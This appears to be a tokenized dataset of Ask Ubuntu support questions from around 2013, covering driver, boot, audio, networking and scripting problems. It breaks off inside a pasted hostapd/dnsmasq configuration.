391238	cinnamon running in software rendering mode while unity and gnome work fine	i 'm running ubuntu 12.04 32bit with intel atom cpu n2800 and gma3600 graphics chipset ( lenovo s110 ) . i have the drivers `` intel cedarview graphics driver '' and `` drm driver for the intel gma500 '' both `` activated and currently in use '' in the additional drivers window . unity and gnome work perfect , but when logging in with cinnamon it runs in software rendering mode , not recognizing the graphics driver . this intel graphics chipset have a really bad support for linux and the proprietary and outdated driver will only work with this kernel version ( https : //wiki.archlinux.org/index.php/intel_gma3600 ) . thanks in advance , any help is really appreciated .
391242	12.04.3 live flash repeatedly asks for login on boot	installed ubuntu-12.04.3-desktop-i386 to a flash drive . booted it , mounted a harddrive and then umounted it . changed desktop resolution , shut down . the app i used to install the image on the flash drive in windows ( universal-usb-installer-1.9.5.1 ) set 5 gb aside for persistence , so these settings should be stored there . after shutting down , i disconnected a few hard drives and connected another which i 'm gon na be using the live session to copy data from ( copy whole fs to flash with dd ) . when i booted up the live session again , ubuntu asks for login . i login with u : ubuntu p : < blank > and the screen turns black for a moment , and then presents me with antoher login prompt . this continues indefinitely . i 'll probably end up just reinstalling the image on the flash drive , and do my copying on the first boot . this still feels pretty much like a bug though , and you 'd probably want to know about it . how to fix this ? or how to boot into single user mode ? if you can tell me either maybe i 'll save some time reinstalling the os to flash .
391244	ubuntu as backup and file share	i have a desktop with three internal drives . 80gb main drive with ubuntu installed 1.5tb data drive formatted to ntfs 1.5tb data drive formatted to ntfs what i want is for the two ntfs drives to be automatically mounted to the same point so crashplan can see and backup from/to them . as it is now when the machine restarted it does n't seem to recognize them and then when remounted the drive is treated as new and the entire backup starts all over again . additionally , i 'd like to be able share the ntfs drives over my local network so my wife 's windows pc and my mac can connect to them for read/write . i know this information could probably be cobbled together from existing resources , but i have very little time to work on this issue ( new baby ) and want to be sure my data is safe ; i 'm very new to linux . thanks in advance !
391245	ubuntu wo n't detect my hard drive to install ubuntu onto	all right i am very new here , and i have very minimal knowledge of installing an os , but i am trying to install ubuntu instead of my pirated windows 8 which i lost my original key for windows 8 . when i boot my computer normally it does n't load , it shows patents and asks me to reboot and select proper boot device . i decided to swap to ubuntu until i can get my hands on a legal copy of windows , but when ever i goto install it it only detects the flash drive i am booting it off of ...
391247	installing ubuntu +grub/lilo from usb	when i 'm trying to install 12.04 on my formatted drive . it works fine until the master boot loader step . it ca n't install lilo or grub . it throws this error for grub executing 'grub-install /dev/sda ' failed . this is a fatal error . and just stops at 'configuring lilo ' for lilo . i have no booter on this computer.i do n't know how to manually boot into ubuntu . i have an exam due in 2 days and i 'm nearing my breaking point , please help .
391248	how to bring back auto scroll in chrome ?	how to bring back auto scroll in chrome ? i 'm really addicted to this feature and i feel like i 'm missing a hand browsing without this feature . can i do this in chrome ? i 'm using ubuntu 13.10 .
391249	error code 0xc0000225 after installing dual boot linux	when i try to boot to windows 8 i get error code 0xc0000225 ever since i installed ubuntu . i was using windows 8 developer preview so i do n't have an installation disk disk to do a recovery . http : //paste.ubuntu.com/6579500/ any help appreciated , i have some important files in windows that i did n't back up .
391250	os collapsed after installing ubuntu 13.10	i upgraded my ubuntu from 13.4 to 13.10 . there was a system hang at the time of installation and i had to force-shutdown by pressing the power key . when i try to login , i see that the total os has collapsed now . i am not able to open any folder or file . how should i fix it ?
391253	ubuntu does n't work on windows 8	i think it has something to do with uefi but i 'm not sure . i run it through iso and it installs correctly but when i restart me computer , it loads but comes up with an error and i have to restart to put it back into windows 8 .
391255	need proper driver for ibm x206m xserver graphics chip	i installed ubuntu 13.10 on an ibm x206m server but the graphics is sluggish/lagging when opening/moving the windows . the `` about your system '' window indicate that a default driver from gallium llvmpipe file is being used . a search on the ibm site indicate that the x206m server is using an ati ( es1000 ) on-board graphics chip . which driver ( and how ) do i install the proper driver to correct this sluggish/lagging display symptom . i am a newbie ; i will need step-by-step instructions
391257	hdmi audio not working on xbmcbuntu ( 12.10 ) , working on ubuntu 13.04 liveusb . need assistance troubleshooting ( alsa logs inside )	i 'm trying to get my hdmi audio working on my new htpc ( intel nuc d54250wyk w/ intel hd5000 ) . i installed xbmcbuntu , which uses ubuntu 12.10 ( 3.5.0-44-generic ) . hdmi audio not working . tried 13.04 live usb.. hdmi audio is working fine . here are my alsa logs : 12.10 x86 ( not working ) | 13.04 x64 ( working ) one thing i did notice is that the devices read differently . 12.10 ( not working ) : 0 [ intel ] : hda-intel - hda intel hda intel at 0xf7c34000 irq 60 1 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xf7c30000 irq 60 13.04 ( working ) : 0 [ mid ] : hda-intel - hda intel mid hda intel mid at 0xf7c34000 irq 63 1 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xf7c30000 irq 64 i 'm not too savvy on this stuff .. any ideas ? edit : solved ! updated kernel to 3.10.x .. apparently < v3.10 does not support audio over hdmi on haswell
391258	pop-up window from ubuntu	i bought the pc from a friend who had ubuntu 11.10 installed . i upgraded to 12.04 lts . ubuntu asks me to sign up , which i do , with each of my different e-mail accounts and respective codes . nothing happens since ubuntu does not recognize any one of them . what seems to be the problem ?
391260	problems with rt3070	i have worked on this looking at other people 's question regarding this with no success . what i want to do is install the drivers for a usb wifi reciever . i downloaded the drivers from mediatek.com and i downloaded the 5th one down because it included the rt3070 . after downloaded it , unpacked it in my desktop and then changed the wpa stuff to make it visable in the network connections ( not my problem ) . then i made it made install and then when i went to modprobe rt3070 it said not found . but there was rt5572 and successfully added it . i went and connected it and could use the internet . then linux crashed . something about kernal panic not in sync . am i sopposed to make a rt3070.ko and if so how ? because it only makes 5572.ko please help any tips would be greatly appriciated
391264	chinese input method without changing to chinese	when i change language to chinese i automatically get a pinyin input available . how can i access this pinyin input tool without switching everything to chinese ? i do n't feel like installing additional software , the one that seems to exist is good enough , but i cant access it without chaning everything to chinese ! thanks in advance !
391266	can not play videos files despite ubuntu restricted extras	despite i have installed the ubuntu restricted extras package , the videos application raised error whenever i try to play a video . for example : for avi : videos requires to install plugins to play media files of the following type : mpeg-4 video decoder for mp4 : videos requires to install plugins to play media files of the following type : h.264 decoder unlikely videos , on vlc they works . how to avoid this errors ?
391267	how do i install ubuntu on an ouya ?	having recently bought an ouya , and generally being interested in arm-powered hardware , i realised that the ouya could double up as an excellent little arm linux desktop . all i would need to do is connect an hd monitor , keyboard , and mouse â and well , somehow install a full linux desktop environment such as ubuntu gnome . any ideas on how to do this ? edit : this is part of a larger problem of arm desktop support , and my findings on this topic have deviated from the question i originally posed here . i have asked a more general question about arm desktop hardware that works with ubuntu : what is the best way of making an arm ubuntu desktop ? it 's actually my original question , but i jumped straight to the ouya thinking it was a good place to start .
391268	installing nvidia gt 740m driver on ubuntu 13.10 get black screen after login !	i 'm using hp pavilion with nvidia geforce gt 740m , after finish installing ubuntu 13.10 try to install nvidia driver 331.20 but i got black screen after login to ubuntu . how can i fix the problem ?
391273	gt 430 ubuntu 13.10	i installed 13.10 on my system and downloaded the latest nvidia drivers from their website . version 331.20 . i stopped the xserver i think it is and installed the driver but upon reboot i only have an orange blinking cursor and ca n't get to the gui . i will reinstall again once i know how to get this working as i ca n't get full resolution of 1600x1200x32 . edit : got some progress but still can get 1600x1200 resolution . i was using this driver in second picture .
391274	grep string from a pcap file	i 'm trying to figure out the correct command syntax . i have a pcap file , and i want to use grep , and grep only to take out all of the uniq ip addresses from without the file so assuming the file is called capture.pcap and is in my home folder , what should i write ? i assume the regex can be '\d { 1,3 } \.\d { 1,3 } \.\d { 1,3 } \.\d { 1,3 } ' and that sort and uniq must be included also , but it seems the pcap does n't respond well with grep , for example using the normal syntax of grep file word does n't work , if i run : grep 239 ./capture.pcap i get the replay binary file ./capture/pcap matches
391276	no root file system is defined : buttons locked up : ca n't use partition	i 'm installing ubuntu on a brand new build using a bootable usb . i do n't have windows or anything installed and this is the message i get when i click install : it says to edit something in the partition , but i when i click add , change , delete , revert , new partition table , nothing happens . i have n't found any videos or instructions that are useful . should i have never used linux , so should i just put a bullet in this thing and install windows or what .
391278	how to allow ssh from internet when it is forwarded to a non-standard port	i 'm configuring a virtual firewall using shorewall and have a rule to forward the external port 2222 to internal port 22 : dnat inet lan:192.168.1.2:22 tcp 2222 where 192.168.1.2 is the ip address of the firewall . but it does n't work ! i do n't want to allow ssh directly ( port 22 ) like this : ssh ( accept ) inet $ fw how do i make the firewall accept redirected ssh ?
391279	after upgrade to 13.10 gnome-terminal is black with no decoration or text . how to fix ?	all window decoration is black . however scroll bars , maximize , minimize and exit buttons are active if one can find them . separately , in the case of gnome-terminal , all text , whether prompts , std output or input is invisible . text input is active . i can launch and kill applications in the window and kill the window by typing exit . i have tried reinstalling compiz , compiz-core , compiz-gnome and xserver-xorg with no change in behavior . i have also tried several other incantations found on the web with no change in behavior . if i ssh -y into the machine from a different machine the windows are properly decorated and gnome-terminal text is visible . what log files might be relevant ? any ideas how to fix ?
391281	how to manage sqlite database with ubuntu server 12.04	i have installed php and sqlite in my ubuntu server running nginx . i 'm in doubt in how i should manage the sql database . how should i install something like phpmyadmin that would work in these conditions and how should i proceed to use it ? thank you very much ! ( btw , should i have installed mysql or is it going to be definitely deprecated ? )
391282	tabs missing in unity dash	after my friend having accidentally aborted the update to ubuntu 13.10 , several tabs in the unity dash are missing . is there any package i can install to get them back ?
391285	ubuntu goes to black screen after any chosen grub options	i am new to ubuntu and i have tried everything that i can think of . i have windows 8 and i wanted to try ubuntu . but , when i boot to my usb , it shows my grub options , `` try without installing '' `` install '' `` oem install '' and `` boot-repair '' . when i choose any one of these options , it does n't work at all , it just goes to a black screen and stays there . i checked if my graphics card was not compatible , but it is fully compatible . i do n't know what to do now . i have a toshiba satellite c855d-s5100 with windows 8.1 pro installed with secure boot and fast boot off . this usb flash drive was made by the site standards with the 64-bit iso put on the formatted flash drive using the site specified application . i have also tried this on my family 's desktop and it runs perfectly first try via my usb flash drive , i just ca n't use that computer for ubuntu because the hdd is completely full . can somebody please help me with this issue ?
391288	all email says `` can not find server '' , including thunderbird signup	i have tried to load yahoo mail , as well as the thunderbird signup within ubuntu , and all i see is `` can not find server '' ; i have looked for help via the forums for several days , and it appears that my problem likely lies in dns settings . can someone list how to access dns settings , as well as what the correct listing of them should be ?
391291	virtualbox does n't detect 3d on ubuntu host ?	when i try to enable 3d acceleration in guests , i receive this warning : can someone help me ?
391294	installed the latest nvidia drivers and ubuntu wo n't start anymore : (	i had a fresh install of 13.10 . the graphics were laggy and it was crashing when i was changing wallpapers so i went ahead to install the latest nnvidia drivers . ( it was using some generic one before that ) . i followed a tutorial that had me add a ppa rep and install it from there . all went good but , when i restarted ; ubuntu does n't load but gives me a blank black screen after i select it from the boot menu . p.s . here is the tutorial i followed .
391296	how to change the location of apt-get archive ?	i tried this command but nothing changed . how can i do it ? sudo ln -s /media/myflash/temp /var/cache/apt/archives
391301	blender 2.62 not rendering objects	installed blender ( 2.62 ) from software center . the interface loads good but objects are not visible in any view . it shows that objects are selected but they appear no where . even the default cube , lamp and camera are not visible . net-book specs , intel dual core 1.6 ghz processor ram 1gb resolution 1024*600 graphics : intel gma 3600 os : ubuntu 12.04.1 desktop enviroment : lxde and unity i have cedar-view graphics driver installed as suggested in additional drivers , it gives me native resolution and hardware accelerated x. i can play some games with nice frame-rates , like irrlamb , lugaru , xmoto and assaultcube . glxgears gives an average of 120 fps . any reason why blender is not working correctly ?
391303	lxde some windows are longer than the screen 's height	i 'm using lxde on my notebook . the screen is so small that some windows are too long to fit in it . since it 's lxde there 's no bottom workspace where the rest of the window should be .
391307	lxde bluetooth gone . how do i get it back ?	suddenly i ca n't find the bluetooth icon on the lxde system tray . i might have disabled it by mistake . how do i get it back ? i tried to open `` run '' from the menu and typing bluetooth-agent but nothing happens . i used to disable bluetooth by right-clicking the icon and choosing `` disable '' ( or something like that ) just to save battery charge . it used to reappear on restart but now it does n't . it 's there in unity but not in lxde . lsmod | grep bluetooth gives out this bluetooth 202226 22 bnep , btusb , rfcomm edit : following this question ca n't enable bluetooth 13.10 i tried try sudo rfkill unblock bluetooth but it did nothing
391310	unable to access jarfile	i 'm trying to run a .jar file on the start up of my linux machine ( ubuntu 12.04 server ) my script works as long as i run it inside the directory which it is in . if i try to run outside the directory i get the error can not access jarfile settasks.jar i suppose my other script is having the same issue . is this possibly a script error or a permissions error ? i 'm completely lost and i have not found anything as of yet to resolve the issue . any help will be welcomed .
391317	why would mouse work but not be discovered for gpointing ?	i 'm using a laptop with a built-in touchpad and i 've attached a microsoft wireless mouse . while the mouse functions , the mouse and touchpad settings do n't display the mouse . this prevents me from managing it via the ui . why would the mouse function but not be discovered as a gpointing device ?
391318	c++ running on ubuntu touch ?	is it possible to run code written in a language like c++ , c , c # ect . on ubuntu touch ?
391320	balance of gsm usb modem using ussd	is there some tools/commands i can use to get the ussd like check balance and data balance of the gsm sim card in my usb modem ( intex speed 3.5g ) ?
391328	delete fedora , install ubuntu , keep windows	i installed fedora ( version 17 beta ) some time ago , but i do n't like it . i 'd like to replace it with ubuntu 13.10 and keep my windows 7 untouched . i use grub to boot . my computer is 64-bit . i do n't have the windows installation cd . during ubuntu installation i do n't know what to do with fedora partitions . can i delete them in windows ? wo n't that also delete grub ? will i be able to boot normally after that ? partition view in windows
391329	`` system policy prevents installing the bootloader ''	i am running usb-creator-gtk . after copying files it says : `` system policy prevents installing the bootloader '' . why does it say this ? i am not trying to modify my system . i am creating a bootable usb drive . i do n't understand why modifying a thumb drive would require administrator privileges .
391333	nvidia gt220 ubuntu 12.04 lts	i 'm new to linux/ubuntu all together . installed it on my first pc build last night and i 'm having trouble getting the drivers set . i currently have the card in the board and i have nvidia 319 drivers active . i installed sysinfo guessing that would help me get the card up an running and when i click the nvidia tab , all the details of the card are unknown . i clicked on display settings and i get a error message about nvidia driver x. installed nvclock but cant open the app due to the lack of appropriate drivers . i just wan na get the card working so i can use the hdmi port . i currently have no speakers , so no sound . can anyone direct me to a forum or guide me to getting the card working ? thanks .
391334	install 13.10 failed - stuck at grub	tried installing 13.04 to an old win 2k machine as dual boot . downloaded .iso , burned to cd , then put into machine . i said install next to win2k . afterwards , boot fails . could n't figure it out , nor how to uninstall . posts said install another version wipes out prior linux . so i tried 12.03.4 or whatever . got a different boot error , simply file not found . so i tried again with 13.10 . same as original error . error is : error : file /boot/grub/i386-pc/normal.mod not found grub rescue > i did some looking at posts , which are hard to decipher for a total newbie . . . did the ls command , which yields ( hd0 ) ( hd0 , msdos6 ) ( hd0 , msdos5 ) ( hd0 , msdos1 ) ( fd0 ) i think it is just a single hard drive , but not sure . i have no idea which might be the boot partition ? maybe the non-msdos ones ? i tried an ehow.com set of steps to set prefix and then root and then say insmod normal , but it did n't seem to work and the computer still does n't boot . if i interrupt the boot sequence i can start from the cd and run ubuntu that way as a test . but my computer is stuck and wo n't boot from the hard drive . what can i do ? in detail , please - i 'm ok in windows terminology but linux is `` greek '' to me . later info 12/18/13 : after looking at other posts with this `` generic '' problem , i did `` ls '' for each of the ? drives , : ls ( hd0 ) / and so on . the boot one is supposed to yield `` lost+found and so on . '' most yielded `` unknown file system . '' ( hd0 , msdos6 ) / yielded a blank line . ( fd0 ) / yielded `` error : failure reading sector 0x2 from fd0 '' so i still have no idea which is the `` right '' partition . 12/20/13 update . installed from '' live '' dvd session , telling it to uninstall and re-install ubuntu . seemed ok . upon reboot , same error as above . doing the `` ls '' command yields the same results also . the msdos6 version yielded a blank line . maybe i 'll try to uninstall per a `` dillmo '' post of jun 30 . 12/22/13 final update . i had no luck . gave up . the uninstall led me down a dead end . so i went old-school . used a floppy to run fdisk and delete all partitions . then used a 2009 article from computer world to prepare partitions for ubuntu . tried first install from `` live '' session . but it stalled early on . sigh . tried agai , but this time install , not trail ( live ) session . it worked . running 13.10 and it seems fine now i need to learn a little about linux . . .
391337	created partition but not showing up on install wizard - dual booting ubuntu 13.10 on windows 8	i know there are dozens of similar questions and sorry for asking another one , but i ca n't find an answer that tells me about my problem . i created a 10gb partition in windows 8 which is now unallocated space . i restarted into try ubuntu and wanted to install it . when i came to the installation type option it showed me two options : erase disk and install ubuntu or something else . i chose something else , but when i did it only showed me my c drive as 500gb free space . the 10gb which i unallocated was not shown there . i want to know if i continue with partitioning my c drive ( which has windows 8 on it ) , will that erase anything on that drive ? what will it do , and why is the installation not showing the 10gb that i 've unallocated ? please help !
391346	installing ubuntu 13.10 on hp mini ... freezing at ( initramfs )	so i 'm installing 13.10 through virtual box and it begins to initiate then just stops ... last message on screen is ... busybox v1.20.2 ( ubuntu 1:1.20.0-8.1ubuntu1 ) built in shell ( ash ) enter 'help ' for a list of built in commands . ( initramfs ) any help is appreciated .
391347	bash : changing file extentions of all files in a directory and copying odd lines	how would one go about taking all the *.txt files in a given folder ( users input ) and copying odd lines to files with identical names but different extension ( bat/html or anything else ) i assume cp or mv wont work , something like sed should do the trick for lines , but im having a hard time incorporating everything together . if anyone could help me piece this together i would be very thankful # ! /bin/bash clear # seems like a good idea to get a full path to the directory im gon na be working in , not # sure how to go about it though . path=pwd # getting users input read directory # check if said directory exists if [ -d $ directory ] ; then # if it does # all files with .txt extention are to be copied for *.txt in $ ( ls ) do mv *.txt *.bat # aaand now im lost , didnt have a chance to even test this , since i have linux only in # my studying enviroment ( uni ) , will get on my personal pc later on # something like sed could/should work in there , but i have no idea how to go about it # if doesnt else echo `` directory does not exist or you do not have a permission to alter its contents ''
391348	menu , launchpad and windows disappeared	on my fresh installed ubuntu , i ran the things described in this list , more precisely the last part installing a bunch of softwares , when all the unity layout disappeard . there was : no launchpad no menu bar windows were only with their bare content alt-tab and other commands of this kind were not responding in the end i hard-reboot my computer , restarted , and : it looked like my graphic cards driver was not there anymore ( steam saying i only have 250mb of dedicated gpu memory , simple 2d game being suddenly slow ) so i assumed something made my graphic driver wrong . i have a ati radeon hd 6800 , so i went to amd 's website and installed their last drivers , then rebooted . then : at boot , a message ( which i do n't have the time to see exactly ) tells me it desactivated tty ( i guess it 's a video driver problem ? ) for a second , the desktop appears correctly , but then everything disappears as said before . i try to access the terminal but ca n't ( tty desactivated ) . i actually ca n't do anything else than clicking arround . right clicking and openning the desktop customization menu works though . now i ca n't really do anything , not even access a terminal , so i do n't know how to unstuck this ...
391349	trouble downloading	i have attempted 4 times to download ubuntu ( i want to try before buying ) each time , i avoid the paypal payment ( i do n't have an account ) i choose download for free . i am taken to a page that says `` access denied '' i do n't mind paying for it if i like it > is it free or not ? ts
391353	how to set default layout/profile for terminator for tabs on start ?	my terminator starts with solarized-dark layout , but then when i open new tabs , it uses default layout . how can i make it solarized-dark for any tab ? [ global_config ] title_transmit_bg_color = `` # d30102 '' focus = system [ keybindings ] [ profiles ] [ [ default ] ] # solarized-dark # palette = `` # 073642 : # dc322f : # 859900 : # b58900 : # 268bd2 : # d33682 : # 2aa198 : # eee8d5 : # 002b36 : # cb4b16 : # 586e75 : # 657b83 : # 839496 : # 6c71c4 : # 93a1a1 : # fdf6e3 '' # foreground_color = `` # eee8d5 '' # background_color = `` # 002b36 '' # cursor_color = `` # eee8d5 '' [ [ solarized-dark ] ] palette = `` # 073642 : # dc322f : # 859900 : # b58900 : # 268bd2 : # d33682 : # 2aa198 : # eee8d5 : # 002b36 : # cb4b16 : # 586e75 : # 657b83 : # 839496 : # 6c71c4 : # 93a1a1 : # fdf6e3 '' foreground_color = `` # eee8d5 '' background_color = `` # 002b36 '' cursor_color = `` # eee8d5 '' [ [ solarized-light ] ] palette = `` # 073642 : # dc322f : # 859900 : # b58900 : # 268bd2 : # d33682 : # 2aa198 : # eee8d5 : # 002b36 : # cb4b16 : # 586e75 : # 657b83 : # 839496 : # 6c71c4 : # 93a1a1 : # fdf6e3 '' background_color = `` # eee8d5 '' foreground_color = `` # 002b36 '' cursor_color = `` # 002b36 '' [ layouts ] [ [ default ] ] [ [ [ child1 ] ] ] type = terminal parent = window0 profile = solarized-dark [ [ [ window0 ] ] ] type = window parent = `` '' [ plugins ]
391354	my hp deskjet 3521 wo n't print on 12.04	my printer wo n't print at all . it 'll scan , but it wo n't print . when i try to print a test page , it attempts to go through , and it attempts it , and after it is finished , it goes to idle . help ?
391356	5.1 hdmi mixed channels , stuttering/choppy audio	i 've bought an intel core i3 4130 with a gigabyte h87n-wifi motherboard with the intention of creating an htpc . i 'm trying out ubuntu 13.10 on a live usb and everything works except for 5.1 surround audio . i get this error when testing out individual speakers : link front left , right , centre and lfe play in their correct speakers but rear left and right play out of front left and right respectively . when i choose digital stereo the audio plays fine . i 'd play out of digital optical s/pdif but it does n't seem to support 5.1 for some reason , and my surround system does n't support mixing hdmi video and optical audio sources . i 've searched almost everywhere and have n't been able to find anyone who has experienced a similar issue . please fire away with any suggestions you may have ! aplay -l : **** list of playback hardware devices **** card 0 : mid [ hda intel mid ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 0 : alc892 analog [ alc892 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 1 : alc892 digital [ alc892 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 aplay -l : default playback/recording through the pulseaudio sound server hdmi : card=mid , dev=0 hda intel mid , hdmi 0 hdmi audio output hdmi : card=mid , dev=1 hda intel mid , hdmi 1 hdmi audio output hdmi : card=mid , dev=2 hda intel mid , hdmi 2 hdmi audio output dmix : card=mid , dev=3 hda intel mid , hdmi 0 direct sample mixing device dmix : card=mid , dev=7 hda intel mid , hdmi 1 direct sample mixing device dmix : card=mid , dev=8 hda intel mid , hdmi 2 direct sample mixing device dsnoop : card=mid , dev=3 hda intel mid , hdmi 0 direct sample snooping device dsnoop : card=mid , dev=7 hda intel mid , hdmi 1 direct sample snooping device dsnoop : card=mid , dev=8 hda intel mid , hdmi 2 direct sample snooping device hw : card=mid , dev=3 hda intel mid , hdmi 0 direct hardware device without any conversions hw : card=mid , dev=7 hda intel mid , hdmi 1 direct hardware device without any conversions hw : card=mid , dev=8 hda intel mid , hdmi 2 direct hardware device without any conversions plughw : card=mid , dev=3 hda intel mid , hdmi 0 hardware device with all software conversions plughw : card=mid , dev=7 hda intel mid , hdmi 1 hardware device with all software conversions plughw : card=mid , dev=8 hda intel mid , hdmi 2 hardware device with all software conversions sysdefault : card=pch hda intel pch , alc892 analog default audio device front : card=pch , dev=0 hda intel pch , alc892 analog front speakers surround40 : card=pch , dev=0 hda intel pch , alc892 analog 4.0 surround output to front and rear speakers surround41 : card=pch , dev=0 hda intel pch , alc892 analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=pch , dev=0 hda intel pch , alc892 analog 5.0 surround output to front , center and rear speakers surround51 : card=pch , dev=0 hda intel pch , alc892 analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=pch , dev=0 hda intel pch , alc892 analog 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=pch , dev=0 hda intel pch , alc892 digital iec958 ( s/pdif ) digital audio output dmix : card=pch , dev=0 hda intel pch , alc892 analog direct sample mixing device dmix : card=pch , dev=1 hda intel pch , alc892 digital direct sample mixing device dsnoop : card=pch , dev=0 hda intel pch , alc892 analog direct sample snooping device dsnoop : card=pch , dev=1 hda intel pch , alc892 digital direct sample snooping device hw : card=pch , dev=0 hda intel pch , alc892 analog direct hardware device without any conversions hw : card=pch , dev=1 hda intel pch , alc892 digital direct hardware device without any conversions plughw : card=pch , dev=0 hda intel pch , alc892 analog hardware device with all software conversions plughw : card=pch , dev=1 hda intel pch , alc892 digital hardware device with all software conversions
391357	how do you install avconv on ubuntu server 13.04 ?	i 've searched and searched , but i ca n't find anything , besides compiling it , which gives me an error about asm .
391358	dell xps 15z graphics freezes , black screen , overheating	i have had ubuntu running on my dell xps 15z for a while . i took troubleshooting to fix overheating by installing jupiter and tlp . graphics errors like scrolling up by two-finger gesture opens and closes the dash quickly until it crashes , these were more of a problem i had run some command i now do n't remember to activate my nvidia card , which since 13.04 , only the intel one works . recently , i installed compiz config manager and enabled unity improvements and they worked flawlessly for a week . today while playing music and switching a work space , the graphics could not keep up and it crashed . also when i shut my laptop lid instead of locking the screen , it turned black and never returned . any recommendations ?
391359	hostapd serves all webpages to windows 7 client , not so xp or android	i have installed hostapd and dnsmasq in a laptop running linux mint 15 , as a wireless relay : incoming from remote wifi router is through wlan0 , pcmcia wifi card serving client machines is wlan1 . this arrangement works beautifully with my win7 64-bit machine ; all websites load quickly and with no problems , even when streaming video . my win7 box dual-boots win7 or linux mint 14 . no problems in either os . on my windows xp 32-bit computer and android tablet , i have trouble loading certain websites . among them , amazon.com and imdb.com , ( neither of which are pingable from any machine , i believe by website design ) . occasionally , such sites will load the page title at the top of the broswer , ( sometimes not ) , but i 'm still left with blank pages . startpage.com and google.com are iffy : oddly , while one may load fine the other will not or takes a very long time , and there seems to be no way of telling which of the two will load , though one of them will load just fine . the same is often true of ubuntuforums.org and others . the problem exists in firefox , google chrome and ie on the xp box , all browsers on android . distance from the hostapd box is not a factor . all sites are reachable if i use a remote vpn , ( such as vpnbook.com ) , on a client box , ( openvpn or pptp ) . i have tried using straight dchp , ( via dnsmasq ) , on the xp and android machines , letting them receive their network settings strictly from the hostapd server . in those machines , i have also tried adding non-dchp nameservers including google , static ip addresses , and/or adding the default gateway , ( the hostapd box ) . no changes make a difference . any help solving this problem will be much appreciated . my configurations follow . * is used to hide sensitive data /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # wifi access point setup auto wlan1 hostapd.conf # hostapd.conf # define interface interface=wlan1 # select driver driver=nl80211 # set access point name ssid=****** # set access point harware mode to 802.11g hw_mode=g # set wifi channel ( can be easily changed ) channel=11 # enable wpa2 only ( 1 for wpa , 2 for wpa2 , 3 for wpa + wpa2 ) wpa=2 wpa_passphrase=************ dnsmasq.conf # dnsmasq.conf # bind to only one interface bind-interfaces # choose interface for binding interface=wlan1 # specify range of ip addresses for dhcp leasses dhcp-range=192.168.*.*,192.168.* . *,12h no-hosts addn-hosts=/etc/hosts.dnsmasq # interface_net=wlan0 server=208.67.222.222 server=208.67.220.220 hosts.dnsmasq # hosts.dnsmasq 192.168.* . * ****** networks # symbolic names for networks , see networks ( 5 ) for more information link-local 169.254.0.0 nsswitch.conf # /etc/nsswitch.conf # # example configuration of gnu name service switch functionality . # if you have the `glibc-doc-reference ' and `info ' packages installed , try : # `info libc `` name service switch '' ' for information about this file . passwd : compat group : compat shadow : compat # hosts : files mdns4_minimal [ notfound=return ] dns mdns4 hosts : files dns networks : files protocols : db files services : db files ethers : db files rpc : db files netgroup : nis resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 # opendns fallback ( configured by linux mint in /etc/resolvconf/resolv.conf.d/tail ) . nameserver 208.67.222.222 nameserver 208.67.220.220 sysctl.conf # # /etc/sysctl.conf - configuration file for setting system variables # see /etc/sysctl.d/ for additional system variables # see sysctl.conf ( 5 ) for information . # # kernel.domainname = example.com # uncomment the following to stop low-level messages on console # kernel.printk = 3 4 1 3 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 3 # functions previously found in netbase # vm.swappiness = 10 # uncomment the next two lines to enable spoof protection ( reverse-path filter ) # turn on source address verification in all interfaces to # prevent some spoofing attacks # net.ipv4.conf.default.rp_filter=1 # net.ipv4.conf.all.rp_filter=1 # uncomment the next line to enable tcp/ip syn cookies # see http : //lwn.net/articles/277146/ # note : this may impact ipv6 tcp sessions too # net.ipv4.tcp_syncookies=1 # uncomment the next line to enable packet forwarding for ipv4 net.ipv4.ip_forward=1 # uncomment the next line to enable packet forwarding for ipv6 # enabling this option disables stateless address autoconfiguration # based on router advertisements for this host # net.ipv6.conf.all.forwarding=1 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # additional settings - these settings can improve the network # security of the host and prevent against some network attacks # including spoofing attacks and man in the middle attacks through # redirection . some network environments , however , require that these # settings are disabled so review and enable them as needed . # # do not accept icmp redirects ( prevent mitm attacks ) # net.ipv4.conf.all.accept_redirects = 0 # net.ipv6.conf.all.accept_redirects = 0 # _or_ # accept icmp redirects only for gateways listed in our default # gateway list ( enabled by default ) # net.ipv4.conf.all.secure_redirects = 1 # # do not send icmp redirects ( we are not a router ) # net.ipv4.conf.all.send_redirects = 0 # # do not accept ip source route packets ( we are not a router ) # net.ipv4.conf.all.accept_source_route = 0 # net.ipv6.conf.all.accept_source_route = 0 # # log martian packets # net.ipv4.conf.all.log_martians = 1 # # net.ipv6.conf.all.accept_ra = 0 # disable ipv6 net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.lo.disable_ipv6 = 1 # tcp stack tweaking for lossy wireless networks ( added as test : not particularly lossy ) net.ipv4.tcp_frto = 1 net.ipv4.tcp_frto_response = 2 net.ipv4.tcp_low_latency = 1 rc.local # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . ifconfig wlan0 up iwconfig wlan0 rate auto iptables -t nat -a postrouting -s 192.168.* . */24 -o wlan0 -j masquerade # line below starts hostapd on system start /bin/sh /etc/apstart.sh exit 0 iptables.rules # generated by iptables-save v1.4.12 